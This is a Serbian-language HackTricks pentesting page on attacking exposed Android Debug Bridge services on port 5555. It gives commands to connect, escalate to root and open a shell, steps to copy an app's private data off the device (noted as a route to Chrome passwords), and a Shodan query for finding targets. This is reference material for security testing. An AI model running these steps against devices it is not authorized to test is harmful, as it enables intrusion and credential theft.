mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
69 lines
4 KiB
Markdown
69 lines
4 KiB
Markdown
# 5555 - Android Debug Bridge
|
|
|
|
<details>
|
|
|
|
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Drugi načini podrške HackTricks-u:
|
|
|
|
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|
|
|
|
## Osnovne informacije
|
|
|
|
Iz [dokumentacije](https://developer.android.com/studio/command-line/adb):
|
|
|
|
**Android Debug Bridge** (adb) je svestran alat za komandnu liniju koji vam omogućava komunikaciju sa uređajem. adb komanda omogućava razne radnje na uređaju, kao što su **instaliranje i debagovanje aplikacija**, i pruža **pristup Unix shell-u** koji možete koristiti za izvršavanje raznih komandi na uređaju.
|
|
|
|
**Podrazumevani port**: 5555.
|
|
```
|
|
PORT STATE SERVICE VERSION
|
|
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
|
|
```
|
|
## Povezivanje
|
|
|
|
Ako pronađete ADB uslugu koja radi na određenom portu uređaja i možete se povezati s njom, **možete dobiti pristup ljusci unutar sistema:**
|
|
```bash
|
|
adb connect 10.10.10.10
|
|
adb root # Try to escalate to root
|
|
adb shell
|
|
```
|
|
Za više ADB komandi pogledajte sledeću stranicu:
|
|
|
|
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %}
|
|
[adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md)
|
|
{% endcontent-ref %}
|
|
|
|
### Dumpovanje podataka aplikacije
|
|
|
|
Da biste potpuno preuzeli podatke neke aplikacije, možete:
|
|
```bash
|
|
# From a root console
|
|
chmod 777 /data/data/com.package
|
|
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
|
|
adb pull "/sdcard/com.package"
|
|
```
|
|
Možete koristiti ovu tehniku da **dobijete osetljive informacije poput Chrome lozinki**. Za više informacija o tome, proverite informacije i reference koje su dostupne [**ovde**](https://github.com/carlospolop/hacktricks/issues/274).
|
|
|
|
## Shodan
|
|
|
|
* `android debug bridge`
|
|
|
|
<details>
|
|
|
|
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Drugi načini da podržite HackTricks:
|
|
|
|
* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|